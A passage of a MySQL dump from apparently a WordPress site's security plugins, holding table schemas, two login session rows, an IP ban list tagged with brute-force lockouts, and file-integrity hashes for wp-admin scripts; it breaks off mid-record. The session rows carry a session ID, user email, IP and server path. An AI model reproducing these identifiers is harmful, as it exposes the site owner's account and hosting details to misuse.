/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_ips` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary ID',
  `ip` varbinary(16) DEFAULT NULL COMMENT 'IP Address',
  `geo` text COLLATE utf8mb4_unicode_520_ci COMMENT 'GeoIP Data',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created',
  PRIMARY KEY (`id`),
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_ips`
--

LOCK TABLES `lwz_icwp_wpsf_ips` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_ips` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_ips` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_notes`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_notes` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `wp_username` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'unknown',
  `note` text COLLATE utf8mb4_unicode_520_ci,
  `updated_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Updated At',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_notes`
--

LOCK TABLES `lwz_icwp_wpsf_notes` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_reports`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_reports` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `rid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT 'Report ID',
  `type` varchar(3) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Report Type',
  `frequency` varchar(10) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Report Interval/Frequency',
  `interval_end_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS of end of interval',
  `sent_at` int(15) unsigned NOT NULL DEFAULT '0',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_reports`
--

LOCK TABLES `lwz_icwp_wpsf_reports` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_reports` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_req_logs`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_req_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_req_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary ID',
  `req_id` varchar(10) COLLATE utf8mb4_unicode_520_ci DEFAULT '',
  `ip_ref` int(11) unsigned NOT NULL COMMENT 'Foreign Key For Primary ID',
  `meta` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Meta Data',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created',
  PRIMARY KEY (`id`),
  UNIQUE KEY `req_id` (`req_id`),
  KEY `ip_ref` (`ip_ref`),
  CONSTRAINT `lwz_icwp_wpsf_req_logs_ibfk_1` FOREIGN KEY (`ip_ref`) REFERENCES `lwz_icwp_wpsf_ips` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_req_logs`
--

LOCK TABLES `lwz_icwp_wpsf_req_logs` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_req_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_req_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_scanner`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_scanner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_scanner` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Unique Item Hash',
  `meta` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Relevant Item Data',
  `scan` varchar(10) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '0' COMMENT 'Scan Type',
  `severity` int(3) NOT NULL DEFAULT '1' COMMENT 'Severity',
  `ignored_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Ignored',
  `notified_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Last Notified',
  `attempt_repair_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Attempted Repair At',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Discovered',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Soft Deleted',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_scanner`
--

LOCK TABLES `lwz_icwp_wpsf_scanner` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_scanner` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_scanner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_scanq`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_scanq`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_scanq` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `scan` varchar(3) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '0' COMMENT 'Scan Slug',
  `items` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Array of scan items',
  `results` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Array of results',
  `meta` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Meta Data',
  `started_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Started',
  `finished_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Finished',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Created',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Soft Deleted',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=19570 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_scanq`
--

LOCK TABLES `lwz_icwp_wpsf_scanq` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_scanq` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_scanq` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_sessions`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_sessions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `session_id` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `wp_username` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `ip` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '0',
  `browser` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `last_activity_uri` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `logged_in_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Session Started',
  `last_activity_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Seen At',
  `secadmin_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Security Admin Authenticated',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created At',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Soft Deleted At',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_sessions`
--

LOCK TABLES `lwz_icwp_wpsf_sessions` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_sessions` DISABLE KEYS */;
INSERT INTO `lwz_icwp_wpsf_sessions` VALUES (1,'0242f3e1d9d251fa5b65bc02a1c72982','pr@zphiblgz.org','71.120.26.35','c13b7200c84cded4537ab2a9bd2a7ad6','/1920webmaster/',1632312105,1632312105,0,1632312105,1632312105),(2,'0242f3e1d9d251fa5b65bc02a1c72982','pr@zphiblgz.org','71.120.26.35','c13b7200c84cded4537ab2a9bd2a7ad6','/wp-admin/admin-ajax.php',1632312105,1632338804,0,1632312105,0);
/*!40000 ALTER TABLE `lwz_icwp_wpsf_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_bans`
--

DROP TABLE IF EXISTS `lwz_itsec_bans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_bans` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `host` varchar(64) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'ip',
  `created_at` datetime NOT NULL,
  `actor_type` varchar(20) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `actor_id` varchar(128) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `comment` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `host` (`host`),
  KEY `actor` (`actor_type`,`actor_id`)
) ENGINE=InnoDB AUTO_INCREMENT=37 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_bans`
--

LOCK TABLES `lwz_itsec_bans` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_bans` DISABLE KEYS */;
INSERT INTO `lwz_itsec_bans` VALUES (1,'89.42.216.164','ip','2021-01-26 08:00:06',NULL,NULL,''),(2,'196.54.55.27','ip','2021-01-26 08:00:06',NULL,NULL,''),(3,'162.243.187.126','ip','2021-01-26 08:00:06',NULL,NULL,''),(4,'61.154.29.53','ip','2021-01-26 08:00:06',NULL,NULL,''),(5,'46.101.119.24','ip','2021-01-26 08:00:06',NULL,NULL,''),(6,'41.200.141.82','ip','2021-01-26 08:00:06',NULL,NULL,''),(7,'173.239.202.3','ip','2021-01-26 08:00:06',NULL,NULL,''),(8,'87.114.139.185','ip','2021-01-26 08:00:06',NULL,NULL,''),(9,'64.71.202.102','ip','2021-01-26 08:00:06',NULL,NULL,''),(10,'188.166.63.71','ip','2021-01-26 08:00:06',NULL,NULL,''),(11,'173.212.240.246','ip','2021-01-26 08:00:06',NULL,NULL,''),(12,'36.251.87.92','ip','2021-01-26 08:00:06',NULL,NULL,''),(13,'62.210.24.247','ip','2021-01-26 08:00:06',NULL,NULL,''),(14,'100.35.47.77','ip','2021-01-26 08:00:06',NULL,NULL,''),(15,'195.22.127.224','ip','2021-01-26 08:00:06',NULL,NULL,''),(16,'66.249.79.140','ip','2021-01-26 08:00:06',NULL,NULL,''),(17,'66.249.79.3','ip','2021-01-26 08:00:06',NULL,NULL,''),(18,'105.0.2.178','ip','2021-01-26 08:00:06',NULL,NULL,''),(19,'212.200.216.177','ip','2021-01-26 08:00:06',NULL,NULL,''),(20,'124.43.110.234','ip','2021-01-26 08:00:06',NULL,NULL,''),(21,'168.194.94.217','ip','2021-01-26 08:00:06',NULL,NULL,''),(22,'191.114.171.203','ip','2021-01-26 08:00:06',NULL,NULL,''),(23,'46.107.242.29','ip','2021-01-26 08:00:06',NULL,NULL,''),(24,'40.124.52.27','ip','2021-01-26 08:00:06',NULL,NULL,''),(25,'154.160.14.204','ip','2021-01-26 08:00:06',NULL,NULL,''),(26,'112.135.6.230','ip','2021-01-26 08:00:06',NULL,NULL,''),(27,'183.83.208.183','ip','2021-01-26 08:00:06',NULL,NULL,''),(28,'5.188.62.140','ip','2021-01-26 08:00:06',NULL,NULL,''),(29,'105.110.28.169','ip','2021-01-26 08:00:06',NULL,NULL,''),(30,'157.45.38.215','ip','2021-01-28 18:57:04','lockout_module','brute_force',''),(31,'157.45.135.105','ip','2021-01-29 07:33:01','lockout_module','brute_force',''),(32,'122.2.101.115','ip','2021-03-10 07:57:50','lockout_module','brute_force',''),(33,'180.194.49.45','ip','2021-05-20 07:23:40','lockout_module','brute_force',''),(34,'194.35.233.114','ip','2021-06-16 22:11:19','lockout_module','brute_force',''),(35,'152.32.171.98','ip','2021-06-29 12:03:00','lockout_module','four_oh_four',''),(36,'5.156.35.20','ip','2021-09-06 23:32:28','lockout_module','brute_force','');
/*!40000 ALTER TABLE `lwz_itsec_bans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_distributed_storage`
--

DROP TABLE IF EXISTS `lwz_itsec_distributed_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_distributed_storage` (
  `storage_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `storage_group` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `storage_key` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `storage_chunk` int(11) NOT NULL DEFAULT '0',
  `storage_data` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `storage_updated` datetime NOT NULL,
  PRIMARY KEY (`storage_id`),
  UNIQUE KEY `storage_group__key__chunk` (`storage_group`,`storage_key`,`storage_chunk`)
) ENGINE=MyISAM AUTO_INCREMENT=2373 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_distributed_storage`
--

LOCK TABLES `lwz_itsec_distributed_storage` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_distributed_storage` DISABLE KEYS */;
INSERT INTO `lwz_itsec_distributed_storage` VALUES (1,'file-list','',0,'a:1:{s:4:\"home\";s:28:\"/home2/zphiblgz/public_html/\";}','2019-09-19 08:59:24'),(2,'file-list','files',0,'{\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-gallery-widget.js\":{\"d\":1515453954,\"h\":\"437aac35ea3d3a698505ce9aa7a4c090\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-audio-widget.js\":{\"d\":1508736206,\"h\":\"9afcfed7095623b2c6a90ffb3ed2489f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-audio-widget.min.js\":{\"d\":1508736206,\"h\":\"ca37de8a34e673469901c4113e99d693\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-gallery-widget.min.js\":{\"d\":1515453954,\"h\":\"3fbbc0b9f61ddca152fa3847aba20581\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/text-widgets.js\":{\"d\":1515453954,\"h\":\"62f4cd853c19bd9b7e2836395d2ffcf6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-widgets.js\":{\"d\":1515453954,\"h\":\"42607f91d7bb0160a1f7635b2b36c67c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/custom-html-widgets.min.js\":{\"d\":1516143871,\"h\":\"91ded92347b6cc64e9724408d9defa09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/custom-html-widgets.js\":{\"d\":1516143871,\"h\":\"58dbb81230e96444f2de93603322dbac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-image-widget.js\":{\"d\":1515453954,\"h\":\"8fac7176be3db30dfc5d0c59514ac1f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-video-widget.min.js\":{\"d\":1515453954,\"h\":\"b86c749b784acc5a8481b0888619234c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-image-widget.min.js\":{\"d\":1515453954,\"h\":\"b02a9bf568ddbf039eb477f8db40783c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/text-widgets.min.js\":{\"d\":1515453954,\"h\":\"32b7abeff170db2b017381efe0b78fad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-video-widget.js\":{\"d\":1515453954,\"h\":\"133a39bd8c47630947212e04dc47672a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets\\/media-widgets.min.js\":{\"d\":1515453954,\"h\":\"e8e8c2726be86a0e5959689f83e68b4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/svg-painter.js\":{\"d\":1386948194,\"h\":\"87dcfbe97f902fa77cc4a9889c827afc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags-box.js\":{\"d\":1515453954,\"h\":\"63756530c3d8b22327dcc0f15e71b8f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/code-editor.js\":{\"d\":1515453954,\"h\":\"4368208ec74f238fc80ef7dc47b2aba6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/language-chooser.js\":{\"d\":1410725130,\"h\":\"09e20150c7561d0330d7158f744abb4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags-suggest.js\":{\"d\":1492712898,\"h\":\"e6b0ed85e26e70669c5715c7ad0f093e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/color-picker.js\":{\"d\":1515453954,\"h\":\"adfc5e0653304dd92664a01ce7083649\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags-box.min.js\":{\"d\":1515453954,\"h\":\"01b149cd42ae563cc462f7e81384da3d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/set-post-thumbnail.js\":{\"d\":1386948194,\"h\":\"2b5153576d1eee4002fb7ed9e5831251\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/updates.js\":{\"d\":1533270515,\"h\":\"06a4eaec20bc68b7f434a5e66af39ba6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/image-edit.min.js\":{\"d\":1522816230,\"h\":\"8aefd8355be19a71bd7229f9ffb3517f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/color-picker.min.js\":{\"d\":1515453954,\"h\":\"ca1331e8606d08cddd3db4a1c50a0625\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets.min.js\":{\"d\":1517864283,\"h\":\"de756f5669035c3590ed9d4da7773a72\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags.js\":{\"d\":1515453954,\"h\":\"92121be15064830078f19c7f912bc5f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/plugin-install.min.js\":{\"d\":1516143871,\"h\":\"c10e07ae10cf119ed6c90ab69428e48d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/theme.min.js\":{\"d\":1515453954,\"h\":\"88f98b449b8aa12942cafd783b5aa7b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/postbox.min.js\":{\"d\":1471376019,\"h\":\"ddfe27f4efae737b800bad96ed8a0969\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/password-strength-meter.min.js\":{\"d\":1471376019,\"h\":\"1aaa74a24aef982b82498717c1d1e6d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/accordion.js\":{\"d\":1440424008,\"h\":\"ef3fe33d4ce12fe5254e5af1025ce70a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/theme-plugin-editor.js\":{\"d\":1515453954,\"h\":\"520d3d51ba9b168fd8ebdec6fe62355c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/custom-header.js\":{\"d\":1386948194,\"h\":\"32b3005887a4cb606fecc09c756605bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/customize-controls.min.js\":{\"d\":1526741175,\"h\":\"834739e5c30c856f39db861e3427285b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/customize-widgets.js\":{\"d\":1515453954,\"h\":\"e92d16056260b9b00ff62ba8cf8ac956\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/customize-widgets.min.js\":{\"d\":1515453954,\"h\":\"2724ee570a2716c8a7ad0436cb541e7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/editor.js\":{\"d\":1517864283,\"h\":\"e086a26a0c57fde0e82d1b600b6b8df9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/edit-comments.min.js\":{\"d\":1515453954,\"h\":\"0405cc7848d59145b6953e7fd9b1c419\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/edit-comments.js\":{\"d\":1515453954,\"h\":\"a975fc736cdecddbfb9aed80699fb3af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/editor-expand.min.js\":{\"d\":1473263316,\"h\":\"4500034a26d73b737f761adcc7ef5c79\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/custom-background.js\":{\"d\":1515453954,\"h\":\"3e22f2941127d8ca57718fa7de91568b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/xfn.js\":{\"d\":1526741175,\"h\":\"8de5f12403af4eb425b9ae18dad17266\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/nav-menu.min.js\":{\"d\":1515453954,\"h\":\"5169d979fee3b7679953b2b7f434910d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/widgets.js\":{\"d\":1517864283,\"h\":\"e1b8555dd35d833a4233467e448a83fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/post.js\":{\"d\":1526741175,\"h\":\"c80252996072ccb0aa20eb24bfc388e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/postbox.js\":{\"d\":1483983253,\"h\":\"e3dfc3b71fefc8c6eb82df54e3460b53\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/user-suggest.js\":{\"d\":1397708561,\"h\":\"1e33290807fa8b2829ddb0347d0a9305\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/set-post-thumbnail.min.js\":{\"d\":1382734403,\"h\":\"8bc5ca12fa38a607d5af2181311b7a5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags.min.js\":{\"d\":1508736206,\"h\":\"29e8d4a7d3c7c16432b99a053c7a5df5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/tags-suggest.min.js\":{\"d\":1492712898,\"h\":\"b0e2e58bbcb8654f8f6c09726c8df7e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/gallery.js\":{\"d\":1450106801,\"h\":\"78cfa96506bf3965c18afa6de5b5abb6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/media-upload.min.js\":{\"d\":1471376019,\"h\":\"f320174ed63de275264dcf5430c309dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/theme-plugin-editor.min.js\":{\"d\":1515453954,\"h\":\"ebd5a282a3cbe917233b9355f85e02e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/word-count.min.js\":{\"d\":1440424008,\"h\":\"997f505fc9d24a27e4939641450e96a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/accordion.min.js\":{\"d\":1471376019,\"h\":\"226bc149fc7a1d2d56e4530d3b685e58\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/customize-nav-menus.min.js\":{\"d\":1522816230,\"h\":\"b6bd555ecefea0378f027c9441a243e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/gallery.min.js\":{\"d\":1450106801,\"h\":\"4e7b25e9bc3374cf391d5a652651a277\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/link.min.js\":{\"d\":1382734403,\"h\":\"f9ff4694933001933bdec2c133b2252d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/inline-edit-tax.js\":{\"d\":1515453954,\"h\":\"75694df32dda3134f2ae3395701421f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/post.min.js\":{\"d\":1483983253,\"h\":\"ede5f7e8431dbeb790e8cf9665192171\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/inline-edit-post.min.js\":{\"d\":1515453954,\"h\":\"f1d32f222e77a360ff3c62d3a6ee223b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/plugin-install.js\":{\"d\":1516143871,\"h\":\"111082709bd5b31ec3f6230dcbc2c453\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/customize-nav-menus.js\":{\"d\":1522816230,\"h\":\"b398320f5969c1c95bbf52ef6edf95ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/custom-background.min.js\":{\"d\":1483983253,\"h\":\"351f2eef1d5033d68e8982ea86167e3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/theme.js\":{\"d\":1515453954,\"h\":\"7f52d864cd927714515906c74582e21b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/wp-fullscreen-stub.js\":{\"d\":1471376019,\"h\":\"968528cb325471eb001fd8578a8625e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/common.js\":{\"d\":1515453954,\"h\":\"6c175816ac122145e3d941fd3607bacb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/user-suggest.min.js\":{\"d\":1397708561,\"h\":\"e089545cd7fcde5c7cd70de3a70139e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/password-strength-meter.js\":{\"d\":1471376019,\"h\":\"2847576ec45293ab96dc0030974e2629\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/svg-painter.min.js\":{\"d\":1471376019,\"h\":\"a79aca561a5b87b62a710b0526a8e4bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/wp-fullscreen-stub.min.js\":{\"d\":1440424008,\"h\":\"700a94e9934c7b419dfa6790b1dc4a35\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/farbtastic.js\":{\"d\":1382734403,\"h\":\"a73af354a03241715d8698feea340b92\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/inline-edit-tax.min.js\":{\"d\":1515453954,\"h\":\"276a51688f82154e668da8ccc2664360\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-admin\\/js\\/media.min.js\":{\"d\":1471376019,\"h\":\"9be63adbaf5a5acfdbfdd555dc19777d\"},\"\\/home2\\/zphiblgz\\/p